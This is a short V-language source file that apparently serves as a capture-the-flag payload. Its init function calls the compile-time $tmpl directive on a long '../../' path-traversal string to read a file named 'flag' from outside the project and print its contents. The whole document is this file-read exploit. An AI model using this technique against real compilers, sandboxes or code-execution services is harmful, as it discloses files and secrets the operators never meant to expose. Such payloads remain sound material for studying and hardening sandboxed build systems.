module lovelace
fn init(){
	unsafe{
		println($tmpl('../../../../../../../../../../flag'))	
	}
}